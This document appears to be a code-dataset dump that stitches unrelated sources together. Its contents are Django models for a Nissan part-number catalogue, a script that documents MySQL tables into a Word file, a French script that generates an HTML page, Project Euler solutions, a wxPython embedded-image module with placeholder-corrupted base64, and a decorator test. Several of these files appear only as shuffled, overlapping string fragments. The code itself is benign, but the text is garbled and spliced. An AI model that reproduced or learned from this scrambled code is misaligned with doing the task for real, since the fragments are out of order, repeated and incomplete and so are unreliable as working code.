"models.CharField( max_length=20, verbose_name=_(\"Class name\") ) charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class",
"gettext_lazy as _ from django.urls import reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models",
"models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\") verbose_name =",
"Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\") ordering",
"models from django.utils.translation import gettext_lazy as _ from django.urls import reverse from parts.core.managers",
"reverse from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE",
"( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber = models.CharField(",
"_(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def __str__(self):",
"No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"),",
"@property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField(",
"status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE",
"= models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name =",
"Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\",",
"UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table",
") source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200,",
"return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat in template @property",
"Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural",
"= models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") ) selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status",
"verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self):",
") partnumber = models.CharField( max_length=200, verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source",
"\".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um = models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class",
"verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"]",
"_(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel):",
"db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\")",
"in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager, TimeStampModel): um",
"verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self): return self.um class",
"charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\") verbose_name",
"selling_price = models.IntegerField( verbose_name=_(\"Selling Price\") ) status = models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS )",
"unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name",
"( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"),",
"this feat in template @property def add_leading_zero(self): return str(self.selling_price) + \".00\" class UnitMeasure(AbstractUpdateViewManager,",
"= models.CharField( max_length=20, verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\") verbose_name",
"Meta: db_table = _(\"partnumber_class\") verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number",
"Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS =",
"= models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name =",
"class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part Number\") verbose_name_plural = _(\"Parts Number\")",
"self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)]) # !Find way to handle this feat",
"Number\") verbose_name_plural = _(\"Parts Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def",
"models.CharField( max_length=200, verbose_name=_(\"Status\"), choices=PARTNUMBER_STATUS ) unit_measure = models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class",
"= models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\")",
") charge_type = models.CharField( max_length=20, verbose_name=_(\"Charge Type\") ) class Meta: db_table = _(\"partnumber_class\")",
"args=[str(self.id)]) # !Find way to handle this feat in template @property def add_leading_zero(self):",
"verbose_name = _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"]",
"Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def get_absolute_url(self): return reverse('item_class_read', args=[str(self.id)])",
"_(\"Part Number Classes\") ordering = [\"id\"] def __str__(self): return self.class_name.upper() def get_absolute_url(self): return",
"models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField( max_length=200, verbose_name=_(\"Barcode No.\") )",
"= [\"id\"] def __str__(self): return self.um class PartNumberClass(AbstractUpdateViewManager, TimeStampModel): class_name = models.CharField( max_length=20,",
"import models from django.utils.translation import gettext_lazy as _ from django.urls import reverse from",
"verbose_name=_(\"Parts Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code =",
"= _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering",
"Measure\") ) class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural",
"models.ForeignKey( \"UnitMeasure\", verbose_name=_(\"Stock/UM\"), on_delete=models.CASCADE ) class Meta: db_table = _(\"partnumbers\") verbose_name = _(\"Part",
"from parts.core.managers import AbstractUpdateViewManager from parts.core.models import TimeStampModel class PartsNumber(AbstractUpdateViewManager, TimeStampModel): SOURCE_CODE =",
"Number\") ) source_code = models.CharField( max_length=200, verbose_name=_(\"Source Code\"), choices=SOURCE_CODE ) bar_code = models.CharField(",
"= _(\"Part Number Class\") verbose_name_plural = _(\"Part Number Classes\") ordering = [\"id\"] def",
"PARTNUMBER_STATUS = ( (\"Active\", \"Active\"), (\"Depcreated\", \"Depcreated\"), (\"Obsolete\", \"Obsolete\"), (\"Deactivated\", \"Deactivated\"), ) partnumber",
"Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan Indonesia-08\"), ) PARTNUMBER_STATUS = ( (\"Active\", \"Active\"),",
"way to handle this feat in template @property def add_leading_zero(self): return str(self.selling_price) +",
"= ( (\"01\", \"Nissan Japan-01\"), (\"02\", \"Nissan Taiwan-02\"), (\"05\", \"Nissan Thailand-05\"), (\"08\", \"Nissan",
"_(\"um\") verbose_name = _(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering =",
"of Measure\") ) class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of Measure\")",
"verbose_name=_(\"Unit of Measure\") ) class Meta: db_table = _(\"um\") verbose_name = _(\"Unit of",
"_(\"Unit of Measure\") verbose_name_plural = _(\"Unit of Measures\") ordering = [\"id\"] def __str__(self):",
"Number\") ordering = [\"id\"] def __str__(self): return self.partnumber def get_absolute_url(self): return reverse('parts_number_read_view', args=[str(self.id)])"
] |
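
A minimal usage sketch for the models above, assuming they are importable as parts.models in an installed app with migrations applied; the part number, barcode, and literal values are illustrative only, not data from the project.

# Hypothetical shell session (e.g. python manage.py shell); every literal
# value below is a made-up example.
from parts.models import PartsNumber, UnitMeasure

um = UnitMeasure.objects.create(um="PC")
pn = PartsNumber.objects.create(
    partnumber="32401-55A00",      # illustrative part number
    source_code="01",              # "Nissan Japan-01"
    bar_code="4902480123457",      # illustrative barcode
    selling_price=150,
    status="Active",
    unit_measure=um,
)
print(pn.add_leading_zero)  # "150.00" -- the property appends ".00"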

<reponame>Edinburgh-Genome-Foundry/CAB<gh_stars>10-100
import os

# Load the bundled example data once at import time.
data_path = os.path.join("app", "data", "example_data_file.txt")
with open(data_path, "r") as f:
    DATA = f.read()

<filename>python/problem6.py
#!/usr/bin/python
# Project Euler 6: difference between the square of the sum and the
# sum of the squares of the first 100 natural numbers.
sosq = 0  # running sum of squares
sqos = 0  # running sum (squared below)
for i in range(1, 101):
    sosq += i * i
    sqos += i
diff = (sqos * sqos) - sosq
print("Sum of Squares:", sosq)
print("Squares of Sum:", sqos * sqos)
print("Difference:", diff)
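
As a sanity check (not part of the original script), the same difference follows from the closed forms sum(1..n) = n(n+1)/2 and sum(i^2, 1..n) = n(n+1)(2n+1)/6:

n = 100
s = n * (n + 1) // 2                 # 5050
sq = n * (n + 1) * (2 * n + 1) // 6  # 338350
print(s * s - sq)                    # 25164150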

<filename>euler-29.py
# Project Euler 29: count distinct values of a**b for 2 <= a <= a_max and
# 2 <= b <= b_max. ("različne potence" is Slovenian for "distinct powers".)
def različne_potence(a_max, b_max):
    stevila = set()  # the set de-duplicates repeated power values
    for a in range(2, a_max + 1):
        for b in range(2, b_max + 1):
            stevila.add(a ** b)
    return len(stevila)

print(različne_potence(100, 100))
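
A quick check, not in the original file: the set is what collapses coincidences such as 2**4 == 4**2, and for a_max = b_max = 100 the expected count is 9183.

assert različne_potence(100, 100) == 9183  # known Project Euler 29 result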

#----------------------------------------------------------------------
# This file was generated by C:\Python27\Scripts\img2py
#
from wx.lib.embeddedimage import PyEmbeddedImage

fu4028 = PyEmbeddedImage(
    "iVBORw0KGgoAAAANSUhEUgAAACgAAAAcCAYAAAATFf3WAAAAAXNSR0IArs4c6QAAAARnQU1B"
    # ... base64 PNG payload: several chunks are redacted as "<KEY>" in the
    # source, so the image data is left elided here ...
    "AAAASUVORK5CYII=")

getfu4028Data = fu4028.GetData
getfu4028Image = fu4028.GetImage
getfu4028Bitmap = fu4028.GetBitmap

# -*- encoding: utf-8 -*-
# __author__ = 'FeiZhang <EMAIL>'
# __date__ = '2019-07-20'

from mysqlconn import MyConn
from settings import DB_CONFIG
from gendocx import gen_doc, doc_append_table


def main():
    """
    entry point
    :return:
    """
    conn = None
    try:
        my_conn = MyConn(DB_CONFIG)
        conn = my_conn.conn
        with conn.cursor() as cursor:
            cursor.execute("SHOW TABLES")
            tb_list = cursor.fetchall()
            doc = gen_doc('Database table structure description', 'FEIZHANG')
            for tb in tb_list:
                print(tb)
                tb_name = tb[0]
                cursor.execute("SHOW FULL FIELDS FROM {}".format(tb_name))
                # Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment
                tb_rs = cursor.fetchall()
                # get table comment info
                cursor.execute("SELECT table_comment FROM INFORMATION_SCHEMA.TABLES "
                               "WHERE table_schema='{}' AND table_name='{}'".format(DB_CONFIG['db'], tb_name))
                tb_comment = cursor.fetchone()[0]
                # print("Column name", "Data type", "Null", "Key", "Default", "Column comment")
                # for r in tb_rs:
                #     print(r[0], r[1], r[3], r[4], r[5], r[8])
                doc_append_table(doc, tb_rs, tb_name, tb_comment)
        output_file_name = "outputdoc/{}.docx".format(DB_CONFIG['db'])
        # Document.save() opens and writes the file itself; no separate open() needed.
        doc.save(output_file_name)
    finally:
        if conn is not None:
            conn.close()


if __name__ == '__main__':
    main()
"\"Default\", \"栏位说明\") # for r in tb_rs: # print(r[0], r[1], r[3], r[4], r[5],",
"import DB_CONFIG from gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point :return:",
"| Key | Default | Extra | Privileges | Comment tb_rs = cursor.fetchall()",
"| Default | Extra | Privileges | Comment tb_rs = cursor.fetchall() # get",
"table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\",",
"-*- # __author__ = 'FeiZhang <EMAIL>' __date__ = '2019-07-20' from mysqlconn import MyConn",
":return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as cursor:",
"my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\") tb_list",
"settings import DB_CONFIG from gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point",
"tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field | Type |",
"gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point :return: \"\"\" try: my_conn",
"try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\")",
"table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\",",
"doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file: doc.save(output_file_name)",
"for r in tb_rs: # print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs,",
"WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\",",
"Comment tb_rs = cursor.fetchall() # get table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES",
"import MyConn from settings import DB_CONFIG from gendocx import gen_doc, doc_append_table def main():",
"from mysqlconn import MyConn from settings import DB_CONFIG from gendocx import gen_doc, doc_append_table",
"\"Key\", \"Default\", \"栏位说明\") # for r in tb_rs: # print(r[0], r[1], r[3], r[4],",
"AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\")",
"FIELDS FROM {}\".format(tb_name)) # Field | Type | Collation | Null | Key",
"in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field",
"table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment",
"# Field | Type | Collation | Null | Key | Default |",
"'FEIZHANG') for tb in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM",
"cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field | Type | Collation | Null",
"gen_doc('数据库表结构说明', 'FEIZHANG') for tb in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS",
"Key | Default | Extra | Privileges | Comment tb_rs = cursor.fetchall() #",
"encoding: utf-8 -*- # __author__ = 'FeiZhang <EMAIL>' __date__ = '2019-07-20' from mysqlconn",
"Default | Extra | Privileges | Comment tb_rs = cursor.fetchall() # get table",
"r in tb_rs: # print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name,",
"r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\")",
"DB_CONFIG from gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point :return: \"\"\"",
"Null | Key | Default | Extra | Privileges | Comment tb_rs =",
"| Null | Key | Default | Extra | Privileges | Comment tb_rs",
"def main(): \"\"\" entry point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn =",
"| Collation | Null | Key | Default | Extra | Privileges |",
"comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment =",
"gen_doc, doc_append_table def main(): \"\"\" entry point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG)",
"get table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name))",
"# print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name =",
"| Comment tb_rs = cursor.fetchall() # get table comment info cursor.execute(\"SELECT table_comment FROM",
"| Extra | Privileges | Comment tb_rs = cursor.fetchall() # get table comment",
"from gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point :return: \"\"\" try:",
"# for r in tb_rs: # print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc,",
"# print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\") # for r in tb_rs: #",
"entry point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor()",
"tb in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) #",
"FULL FIELDS FROM {}\".format(tb_name)) # Field | Type | Collation | Null |",
"tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file: doc.save(output_file_name) finally: conn.close() if"
] |
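The INFORMATION_SCHEMA lookup above splices the schema and table name into the SQL text with str.format. Both values come from trusted places here (the server's own SHOW TABLES output and local settings), but the same query is easy to express with driver-side parameters, which avoids quoting mistakes entirely. A minimal sketch, assuming a DB-API 2.0 cursor such as PyMySQL's (MyConn is a project-local wrapper, so the connection details are an assumption):

# Sketch: parameterized version of the table-comment lookup.
# Assumes a DB-API 2.0 driver that uses %s placeholders (e.g. PyMySQL).
sql = (
    "SELECT table_comment FROM INFORMATION_SCHEMA.TABLES "
    "WHERE table_schema = %s AND table_name = %s"
)
cursor.execute(sql, (DB_CONFIG['db'], tb_name))  # the driver escapes both values
tb_comment = cursor.fetchone()[0]

Identifiers such as the table name in SHOW FULL FIELDS cannot be passed as parameters, so that statement has to keep string formatting; restricting it to names returned by SHOW TABLES, as the script does, keeps that safe.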
# Test for the add_user_tag decorator: the wrapped callable must still be
# callable and must carry a __user_tag__ attribute set to 'avimadsen'.
from ..avimadsen import add_user_tag
from .. import echo_args


def test_avimadsen():
    wrapped_echo_args = add_user_tag(echo_args)
    print(wrapped_echo_args('test1', 'test2'))
    assert (hasattr(wrapped_echo_args, '__user_tag__')
            and wrapped_echo_args.__user_tag__ == 'avimadsen')
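The test above pins down the decorator's whole observable contract: the wrapped callable still forwards its arguments to echo_args, and it exposes a __user_tag__ attribute equal to 'avimadsen'. The avimadsen module itself is not part of this dump, so the following is only a sketch of an implementation that would satisfy the test, not the project's actual code:

import functools

def add_user_tag(func):
    """Return func wrapped unchanged, tagged with a __user_tag__ attribute."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        return func(*args, **kwargs)    # forward everything untouched
    wrapper.__user_tag__ = 'avimadsen'  # the attribute the test asserts on
    return wrapper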
[
"les fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On",
"et utilisation </h3> <p>La procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger",
"\"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if __name__ ==",
"On ajoute le doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) #",
"le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et",
"polynésie 2020<br><br> Pour générer la documentation il faut installer le paquet python <a",
"va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype",
"sur le site de l'APMEP<br> Pour le moment le test se fait sur",
"fait les imports nécessaires selon le contexte # Pour générer les fichiers HTML",
"le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\"",
"le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a",
"au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à",
"HTML if __name__ == \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import",
"écriture le fichier html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\")",
"sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le",
"un répertoire, ici pour y mettre les fichiers HTML import os # On",
"Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir",
"imports nécessaires selon le contexte # Pour pouvoir créer un répertoire, ici pour",
"target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\"",
"code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le head",
"# Pour générer les fichiers HTML if __name__ == \"__main__\": from HTML_constantes import",
"\"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ])",
"générer les fichiers HTML if __name__ == \"__main__\": from HTML_constantes import * else:",
"<b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual",
"<b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server",
"l'APMEP<br> Pour le moment le test se fait sur le premier exo du",
"Live server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p>",
"href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3>",
"]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On",
"if __name__ == \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import *",
"ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\"",
"python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3>",
"* else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################",
"tous les exercices des sujets DNB en partage sur le site de l'APMEP<br>",
"sujets DNB en partage sur le site de l'APMEP<br> Pour le moment le",
"for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\"",
"indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre de navigation for elt",
"body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if",
"les fichiers HTML import os # On fait les imports nécessaires selon le",
"<a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans",
"coding: utf8 -*- # @author : <NAME> \"\"\" Génère une page HTML. \"\"\"",
"lancer Live server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul>",
"tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme",
"ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\"",
"ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier",
"un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python",
"la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une",
"en partage sur le site de l'APMEP<br> Pour le moment le test se",
"On fait les imports nécessaires selon le contexte # Pour générer les fichiers",
"fait sur le premier exo du sujet de polynésie 2020<br><br> Pour générer la",
"<a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les",
"</h3> <p>La procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a",
"indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les exercices des",
"ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer",
"Pour générer les fichiers HTML if __name__ == \"__main__\": from HTML_constantes import *",
"fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) #",
"niveau #os.chdir(\"../\") # On crée le dossier qui va accueillir les fichiers HTML",
"nécessaires selon le contexte # Pour pouvoir créer un répertoire, ici pour y",
"fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée pour générer",
"def main(): \"\"\" Fonction principale qui sera appelée pour générer l'ensemble des pages",
": <NAME> \"\"\" Génère une page HTML. \"\"\" pass # On fait les",
"dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine du",
"<b>Visual Studio Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b> et",
"On ouvre en écriture le fichier html qui va recevoir le code indexHTML",
"fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre",
"docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments",
"Génère une page HTML. \"\"\" pass # On fait les imports nécessaires selon",
"fichiers HTML import os # On fait les imports nécessaires selon le contexte",
"HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier",
"indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet",
"html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute",
"les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\"",
"in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p>",
"selon le contexte # Pour générer les fichiers HTML if __name__ == \"__main__\":",
"sera appelée pour générer l'ensemble des pages HTML. \"\"\" pass # On remonte",
"ajoute les éléments de la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt)",
"de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique",
"le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre de navigation",
"</p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body",
"sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3>",
"aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3>",
"des sujets DNB en partage sur le site de l'APMEP<br> Pour le moment",
"target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a>",
"pouvoir créer un répertoire, ici pour y mettre les fichiers HTML import os",
"On remonte d'un niveau #os.chdir(\"../\") # On crée le dossier qui va accueillir",
"#-*- coding: utf8 -*- # @author : <NAME> \"\"\" Génère une page HTML.",
"les imports nécessaires selon le contexte # Pour générer les fichiers HTML if",
"le fichier html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") #",
"remonte d'un niveau #os.chdir(\"../\") # On crée le dossier qui va accueillir les",
"navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([",
